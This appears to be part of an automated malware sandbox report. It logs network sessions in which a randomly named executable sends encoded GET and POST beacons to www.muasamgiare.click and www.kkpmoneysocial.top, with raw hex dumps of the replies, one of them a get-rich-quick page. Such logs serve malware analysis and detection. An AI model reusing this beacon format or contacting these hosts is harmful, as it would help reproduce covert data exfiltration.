                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.54986513.228.81.39806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:50:25.056581974 CET486OUTGET /bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2IMU8cGlDr+1A+pKQ3eOAfVunh78ZhwTBEsJdZkSwuIREwgA==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.muasamgiare.click
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:50:26.635133982 CET523INHTTP/1.1 301 Moved Permanently
                                                                                Server: openresty
                                                                                Date: Sat, 14 Dec 2024 12:50:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Location: https://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2IMU8cGlDr+1A+pKQ3eOAfVunh78ZhwTBEsJdZkSwuIREwgA==&V6T=lB24KzN0lF-8
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.549882172.67.129.38806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:50:32.105751991 CET755OUTPOST /86am/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.kkpmoneysocial.top
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.kkpmoneysocial.top
                                                                                Referer: http://www.kkpmoneysocial.top/86am/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 36 71 36 6e 36 56 4c 7a 55 38 65 73 4a 42 5a 6d 6a 30 2f 45 58 67 7a 73 4d 4b 49 46 41 50 5a 4e 4f 61 31 79 76 59 63 4f 57 42 43 50 53 45 31 48 66 39 54 56 32 68 4f 76 54 42 30 69 77 6c 34 2f 68 51 49 38 62 69 4c 4e 67 2b 55 56 6e 55 4d 30 46 62 6a 71 2f 76 61 4c 72 77 55 76 53 61 6d 73 79 2b 79 48 46 79 30 65 35 6f 4d 55 7a 59 33 66 2b 4f 73 5a 31 37 2b 4c 47 58 64 48 79 57 4e 38 45 6d 4e 62 48 51 69 46 41 47 78 34 31 59 59 50 54 56 6b 6e 46 38 46 7a 75 52 4e 64 33 39 6e 73 4b 6c 66 53 44 68 5a 42 4b 78 64 30 5a 34 78 30 79 75 32 50 46 79 43 33 62 45 47 62 39 47 70 45 56 4c 61 6b 43 49 67 3d
                                                                                Data Ascii: NVK8=6q6n6VLzU8esJBZmj0/EXgzsMKIFAPZNOa1yvYcOWBCPSE1Hf9TV2hOvTB0iwl4/hQI8biLNg+UVnUM0Fbjq/vaLrwUvSamsy+yHFy0e5oMUzY3f+OsZ17+LGXdHyWN8EmNbHQiFAGx41YYPTVknF8FzuRNd39nsKlfSDhZBKxd0Z4x0yu2PFyC3bEGb9GpEVLakCIg=
                                                                                Dec 14, 2024 13:50:33.366174936 CET1236INHTTP/1.1 200 OK
                                                                                Date: Sat, 14 Dec 2024 12:50:33 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Set-Cookie: loclang=en; expires=Tue, 17-Dec-2024 12:50:33 GMT; Max-Age=259200; path=/
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PonFfTN3%2BYX1LKMjd1a0A0suiJBZuTu0ou9ZJGpmirpGAf6rUhx2DAB0zCsrQy%2B8EPPwAiOmK3V5oTLU%2B%2F1z519EMEEOBk9S6TZ4UJIyF00gSsgUkgAj4xc%2B0JKcuTwL8S6ZjI%2BPCJuT"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e51fc6a2ac35d-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1489&rtt_var=744&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=755&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 97 ff 6e db 36 10 c7 ff 0e 81 bd c3 55 28 20 a9 76 24 39 6e b2 2c b2 5c 0c 6d d7 fe 91 60 43 1b ac 18 8a d6 a0 a5 b3 c4 44 22 59 92 fe 85 34 6f b0 77 d8 73 ec ad f6 08 83 64 29 96 57 bb cd 16 24 33 0c 48 a4 79 5f de 7d 78 3c d2 84 0c 1e bd f8 f9 f9 f9 6f bf bc 84 cc 14 f9 90 0c 9a 07 d2 64 48 06 3a 56 4c 9a 21 01 d0 68 ce 59 81 62 6a 9c c9 94 c7 86 09 ee b8 57 04 00 20 17 31 2d db 5e a6 70 12 59 3e e3 09 2e 3c 99 49 2b 24 00 d7 dd c3 20 08 dc 90 0c fc 46 6d 50 a0 a1 10 67 54 69 34 91 35 35 93 fd 63 ab e9 e6 b4 c0 c8 9a 31 9c 4b a1 8c 05 b1 e0 06 b9 89 ac 39 4b 4c 16 25 38 63 31 ee 57 8d 2e 30 ce 0c a3 f9 be 8e 69 8e 51 af 0b 3a 53 8c 5f ee 1b b1 3f 61 26 e2 c2 1a 92 5a 57 2a 21 51 99 65 64 89 f4 84 15 34 c5 96 b6 4f b5 46 a3 7d 2d 62 46 f3 11 2b d2 03 ef 42 a6 37 4e 6d 18 1b 66 f2 b6 f1 5f 7f fc fe e7 29 1a 5b 43 41 2f 11 0a c1 71 09 48 35 cb 97 30 67 26 83 42 8c 59 8e 20 33 c1 11 ca
                                                                                Data Ascii: 446n6U( v$9n,\m`CD"Y4owsd)W$3Hy_}x<odH:VL!hYbjW 1-^pY>.<I+$ FmPgTi455c1K9KL%8c1W.0iQ:S_?a&ZW*!Qed4OF}-bF+B7Nmf_)[CA/qH50g&BY 3
                                                                                Dec 14, 2024 13:50:33.366254091 CET791INData Raw: d1 56 49 74 8b 72 82 2b 44 4c f0 96 fe 3b 04 aa 10 4c 86 30 46 6d 00 a9 e2 8c a7 a0 99 41 10 3c 67 1c 41 d2 65 d9 25 66 a8 e0 71 ff 10 0a 96 e7 4c 70 90 a8 4a 87 4c 06 46 40 3f 08 ba 41 10 40 81 c5 18 95 de 1e 5d 85 e6 a4 e2 db f2 e1 28 08 e4 e2
                                                                                Data Ascii: VItr+DL;L0FmA<gAe%fqLpJLF@?A@](k4k/W.[3c>|]^j<#PO{Qoa-e{%Fe:Y_93ILUj9JqN;Rkd){=G_%U9DBT6Wd


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.549888172.67.129.38806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:50:34.765428066 CET775OUTPOST /86am/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.kkpmoneysocial.top
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.kkpmoneysocial.top
                                                                                Referer: http://www.kkpmoneysocial.top/86am/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 36 71 36 6e 36 56 4c 7a 55 38 65 73 4c 69 78 6d 67 54 44 45 47 51 7a 76 47 71 49 46 4a 76 5a 4a 4f 61 35 79 76 5a 4a 44 57 7a 6d 50 53 6c 46 48 65 34 7a 56 33 68 4f 76 4c 78 30 64 74 31 35 78 68 51 45 43 62 6a 33 4e 67 2b 41 56 6e 57 45 30 46 6f 4c 74 74 50 61 4a 67 51 55 78 63 36 6d 73 79 2b 79 48 46 79 51 34 35 70 6b 55 7a 6f 48 66 34 73 55 57 75 62 2b 4d 46 58 64 48 32 57 4e 34 45 6d 4e 6c 48 53 61 37 41 46 46 34 31 64 63 50 55 42 51 6b 4d 38 46 39 7a 42 4d 4d 38 39 43 6f 56 6e 44 63 66 53 41 6b 57 33 70 57 63 4f 41 65 6f 4d 2b 6e 57 53 75 50 4c 58 4f 73 73 32 49 74 50 6f 4b 55 63 66 31 31 61 68 67 41 4a 61 76 2f 31 5a 77 5a 44 68 67 58 4d 33 52 45
                                                                                Data Ascii: NVK8=6q6n6VLzU8esLixmgTDEGQzvGqIFJvZJOa5yvZJDWzmPSlFHe4zV3hOvLx0dt15xhQECbj3Ng+AVnWE0FoLttPaJgQUxc6msy+yHFyQ45pkUzoHf4sUWub+MFXdH2WN4EmNlHSa7AFF41dcPUBQkM8F9zBMM89CoVnDcfSAkW3pWcOAeoM+nWSuPLXOss2ItPoKUcf11ahgAJav/1ZwZDhgXM3RE
                                                                                Dec 14, 2024 13:50:36.030252934 CET1236INHTTP/1.1 200 OK
                                                                                Date: Sat, 14 Dec 2024 12:50:35 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Set-Cookie: loclang=en; expires=Tue, 17-Dec-2024 12:50:35 GMT; Max-Age=259200; path=/
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNwcr9NzIV4x3V8G74y0B5dsBUpO7ayTivpEP0ZLpey8soUIX8lnPcKiMACMUVyTfPpUQncChcEagdC9dZdgudfyuQM1UOTZvt6ieMzr%2F7EIXUpoxdYxbOcwS%2BehNp%2BDVjfDRfA9FTu1"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e520d0da83342-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=775&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 97 ff 6e db 36 10 c7 ff 0e 81 bd c3 95 28 20 a9 76 24 39 6e b2 2c b2 5c 14 6d d7 fe 91 60 43 1b ac 18 8a d6 a0 a5 b3 c4 44 22 35 92 fe 85 34 6f b0 77 d8 73 ec ad f6 08 83 64 29 96 57 bb cd 16 24 33 0c 48 a4 79 5f de 7d 78 3c d2 84 0c 1e bd fc e9 c5 f9 af 3f bf 82 d4 e4 d9 90 0c 9a 07 b2 78 48 06 3a 52 bc 30 43 02 a0 d1 9c f3 1c e5 d4 d8 93 a9 88 0c 97 c2 76 ae 08 00 40 26 23 56 b6 dd 54 e1 24 a4 1e 17 31 2e dc 22 2d 68 40 00 ae bb 87 be ef 3b 01 19 78 8d da 20 47 c3 20 4a 99 d2 68 42 3a 35 93 fd 63 da 74 0b 96 63 48 67 1c e7 85 54 86 42 24 85 41 61 42 3a e7 b1 49 c3 18 67 3c c2 fd aa d1 05 2e b8 e1 2c db d7 11 cb 30 ec 75 41 a7 8a 8b cb 7d 23 f7 27 dc 84 42 d2 21 a9 75 0b 25 0b 54 66 19 52 99 9c f0 9c 25 d8 d2 f6 98 d6 68 b4 a7 65 c4 59 36 e2 79 72 e0 5e 14 c9 8d 53 1b c6 86 9b ac 6d fc d7 1f bf ff 79 8a c6 d2 90 b3 4b 84 5c 0a 5c 02 32 cd b3 25 cc b9 49 21 97 63 9e 21 14 a9 14 08 e5 68 5a 12 dd a2 1c
                                                                                Data Ascii: 446n6( v$9n,\m`CD"54owsd)W$3Hy_}x<?xH:R0Cv@&#VT$1."-h@;x G JhB:5ctcHgTB$AaB:Ig<.,0uA}#'B!u%TfR%heY6yr^SmyK\\2%I!c!hZ
                                                                                Dec 14, 2024 13:50:36.030323029 CET785INData Raw: e3 0a 11 97 a2 a5 ff 1e 81 29 04 93 22 8c 51 1b 40 a6 04 17 09 68 6e 10 a4 c8 b8 40 28 d8 b2 ec 92 33 54 f0 b8 7f 08 39 cf 32 2e 05 14 a8 4a 87 4c 0a 46 42 df f7 bb be ef 43 8e f9 18 95 de 1e 5d 85 e6 a4 e2 db f2 e1 c8 f7 8b c5 d7 0c 52 e4 49 da
                                                                                Data Ascii: )"Q@hn@(3T92.JLFBC]RI^]S{yYTVYP(bf0W}i?!l]e?qqQwbfAu14Z2rr{FOWuG4e&dU0Y&eBxuex


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.549895172.67.129.38806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:50:37.439019918 CET1792OUTPOST /86am/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.kkpmoneysocial.top
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.kkpmoneysocial.top
                                                                                Referer: http://www.kkpmoneysocial.top/86am/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 36 71 36 6e 36 56 4c 7a 55 38 65 73 4c 69 78 6d 67 54 44 45 47 51 7a 76 47 71 49 46 4a 76 5a 4a 4f 61 35 79 76 5a 4a 44 57 7a 75 50 54 54 52 48 63 5a 7a 56 77 68 4f 76 56 42 30 59 74 31 35 38 68 51 74 46 62 6a 37 43 67 38 34 56 6d 7a 51 30 4d 35 4c 74 30 2f 61 4a 39 41 55 77 53 61 6d 31 79 2b 6a 4d 46 79 41 34 35 70 6b 55 7a 72 66 66 2f 2b 73 57 73 62 2b 4c 47 58 64 62 79 57 4e 51 45 6d 56 31 48 53 65 72 41 54 31 34 31 39 73 50 56 79 34 6b 52 4d 46 2f 77 42 4d 55 38 39 2b 6e 56 6e 66 2b 66 52 64 42 57 77 64 57 63 71 31 6e 35 4e 4b 4d 46 52 36 33 44 58 36 35 35 47 4d 49 41 4f 32 69 62 66 4a 6c 62 67 30 35 41 71 66 47 77 4c 68 2b 66 55 38 61 46 52 73 65 43 79 36 50 65 76 52 2b 71 2b 46 39 72 4d 4b 42 41 35 77 38 79 71 4c 70 4d 58 6f 55 52 41 54 53 78 72 43 6a 56 36 48 6a 6b 77 77 6d 53 39 6c 33 70 55 67 61 50 72 77 36 51 6a 6d 38 31 5a 46 31 44 6b 64 43 68 51 2b 6a 77 39 44 59 49 50 48 46 76 70 6e 72 48 46 72 55 4a 58 55 46 67 57 62 33 4d 5a 59 7a 4c 37 35 70 54 4c 62 43 76 6e 5a 4e 6c [TRUNCATED]
                                                                                Data Ascii: NVK8=6q6n6VLzU8esLixmgTDEGQzvGqIFJvZJOa5yvZJDWzuPTTRHcZzVwhOvVB0Yt158hQtFbj7Cg84VmzQ0M5Lt0/aJ9AUwSam1y+jMFyA45pkUzrff/+sWsb+LGXdbyWNQEmV1HSerAT1419sPVy4kRMF/wBMU89+nVnf+fRdBWwdWcq1n5NKMFR63DX655GMIAO2ibfJlbg05AqfGwLh+fU8aFRseCy6PevR+q+F9rMKBA5w8yqLpMXoURATSxrCjV6HjkwwmS9l3pUgaPrw6Qjm81ZF1DkdChQ+jw9DYIPHFvpnrHFrUJXUFgWb3MZYzL75pTLbCvnZNlX13wri2RfehroUGAEj4tQxeoZ+7j7GQn70gDJmbAROj7Tizy1/4T8J4oEQj6rUC3niTL39iqRKkq8+jrBFPd/LBXP5ok+q/iMMwADJ+LossoOPxdQ0IDuzZYwp2M2txwM2q6ctpMblnRL4LHzBnFkI5jMQbG53DegXxiWbqsj87jdSgWXFt/LHYqSkzOolyIJYC56xzsCAYNXdpu6c0y/HuhfoBm5ufAMh76NSJbBhGOvXbgGz0cykcSlYLF1dGOnafoL2J7Q3gJj7KexWdTK3iDoBx5LgyaEh5NXV/TDbFNckU+2eNmVTrPzJCLv6+FFqeYIqiMAHkDEKHa6GM+A5WLZiMutcuogvfWZbt6E1Ay9vxW+ig4vM5HenGArKCPN0pYgJC3F/bu75jf911H5Sxw1a08loVft9ndlKzOOc9UNLAbqtp3BY6kcSjogFusipK7v4QYDSvLF/+GiORa14W1o2X5TejapVuIUZayQhbmInIXyzQu7mPYcgVITWNk3tSwL4Ap5Me1qHa0Qrm9XtfYqDqSFSyQJxgzqzhsMTymXm7av4q8DLUTvyt71R56IrG6HyhU4qBCEQPrFnCZ8J73Nekk7A3FQap3dZopWQCO4O0avfRvhI7x/9m+iaHFb/mSNDgnJLWdMn2i7oFz2tK8QT3OksDbJK [TRUNCATED]
                                                                                Dec 14, 2024 13:50:38.711863041 CET1236INHTTP/1.1 200 OK
                                                                                Date: Sat, 14 Dec 2024 12:50:38 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Set-Cookie: loclang=en; expires=Tue, 17-Dec-2024 12:50:38 GMT; Max-Age=259200; path=/
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LStDzmAlerKWT8ceAJSwBqLWh2FyYnuCWkqJRG4Uf6sszSAaFjVAGvItrT6KJsmR8hPRVjh4NpbCy4QmUrnQ%2FF5d5FHpTrgKfSpLUfc5w8C6TPIOKlGk5iVBXY5a8JPMCnS4HnIzZdQd"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e521dbd154249-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1719&rtt_var=859&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1792&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 97 ff 6e db 36 10 c7 ff 0e 81 bd c3 55 28 20 a9 76 24 39 6e b2 2c b2 5c 14 6d d7 fe 91 60 43 1b ac 18 8a d6 a0 a5 b3 c4 44 22 39 92 fe 85 34 6f b0 77 d8 73 ec ad f6 08 83 64 29 96 57 bb cd 16 24 33 0c 48 a4 79 5f de 7d 78 3c d2 84 0c 1e bd fc e9 c5 f9 af 3f bf 82 cc 14 f9 90 0c 9a 07 d2 64 48 06 3a 56 4c 9a 21 01 d0 68 ce 59 81 62 6a 9c c9 94 c7 86 09 ee b8 57 04 00 20 17 31 2d db 5e a6 70 12 59 3e e3 09 2e 3c 99 49 2b 24 00 d7 dd c3 20 08 dc 90 0c fc 46 6d 50 a0 a1 10 67 54 69 34 91 35 35 93 fd 63 ab e9 e6 b4 c0 c8 9a 31 9c 4b a1 8c 05 b1 e0 06 b9 89 ac 39 4b 4c 16 25 38 63 31 ee 57 8d 2e 30 ce 0c a3 f9 be 8e 69 8e 51 af 0b 3a 53 8c 5f ee 1b b1 3f 61 26 e2 c2 1a 92 5a 57 2a 21 51 99 65 64 89 f4 84 15 34 c5 96 b6 4f b5 46 a3 7d 2d 62 46 f3 11 2b d2 03 ef 42 a6 37 4e 6d 18 1b 66 f2 b6 f1 5f 7f fc fe e7 29 1a 5b 43 41 2f 11 0a c1 71 09 48 35 cb 97 30 67 26 83 42 8c 59 8e 20 33 c1 11 ca d1 56 49 74 8b 72 82 2b 44
                                                                                Data Ascii: 446n6U( v$9n,\m`CD"94owsd)W$3Hy_}x<?dH:VL!hYbjW 1-^pY>.<I+$ FmPgTi455c1K9KL%8c1W.0iQ:S_?a&ZW*!Qed4OF}-bF+B7Nmf_)[CA/qH50g&BY 3VItr+D
                                                                                Dec 14, 2024 13:50:38.711951971 CET782INData Raw: 4c f0 96 fe 7b 04 aa 10 4c 86 30 46 6d 00 a9 e2 8c a7 a0 99 41 10 3c 67 1c 41 d2 65 d9 25 66 a8 e0 71 ff 10 0a 96 e7 4c 70 90 a8 4a 87 4c 06 46 40 3f 08 ba 41 10 40 81 c5 18 95 de 1e 5d 85 e6 a4 e2 db f2 e1 28 08 e4 e2 6b 06 19 b2 34 6b 2f 57 ff
                                                                                Data Ascii: L{L0FmA<gAe%fqLpJLF@?A@](k4k/W.[3c>|]^j<#PO{Q[9K;?t3sf%EArShwS6{7-;J-3.rs1/S2(om+X$!!d


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.549901172.67.129.38806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:50:40.101349115 CET487OUTGET /86am/?V6T=lB24KzN0lF-8&NVK8=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6buvt3CihlxRoa3yNm7JisfhZdaiIXVwsk9uJu6AhIF/VUrZw== HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.kkpmoneysocial.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:50:41.363744020 CET1236INHTTP/1.1 200 OK
                                                                                Date: Sat, 14 Dec 2024 12:50:41 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Set-Cookie: loclang=en; expires=Tue, 17-Dec-2024 12:50:41 GMT; Max-Age=259200; path=/
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eKCnHs4tN9Gpwbl85gOjIrwZGFqfMqSN0wXxI4Ad1Lcf2D6sa3J0qjs8TV8y7Xhm0EA5kVzwgMpxfIYeYRk4dUeXTr1AjKIDvE0HaTU8SMPH3DFNxC2jRxmOQWe2jpRrJV4slXVlQuyR"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e522e6ea37d0e-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 64 63 34 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 22 3b 0a 20 20 7d 2c 35 30 30 30 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 61 73 73 65 74 73 2f 73 6f 63 69 61 6c 5f 69 6d 67 32 2e 6a 70 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 f0 9f 8c b9 4c 65 74 [TRUNCATED]
                                                                                Data Ascii: dc4<!DOCTYPE html><html><head><script> setTimeout(function(){ location.href="/index.php"; },5000);</script><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta property="og:image" content="/assets/social_img2.jpg"><meta property="og:title" content="Let's make money
                                                                                Dec 14, 2024 13:50:41.363765001 CET1236INData Raw: 20 65 61 73 69 6c 79 20 77 69 74 68 20 6d 6f 62 69 6c 65 20 70 68 6f 6e 65 20 f0 9f 8c b9 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 20 61 72 65
                                                                                Data Ascii: easily with mobile phone "> <meta property="og:description" content="We are the best earning site online paying over $35 million per month to 300,000 members"><meta property="og:image:width" content="600px"><meta property="og:image:he
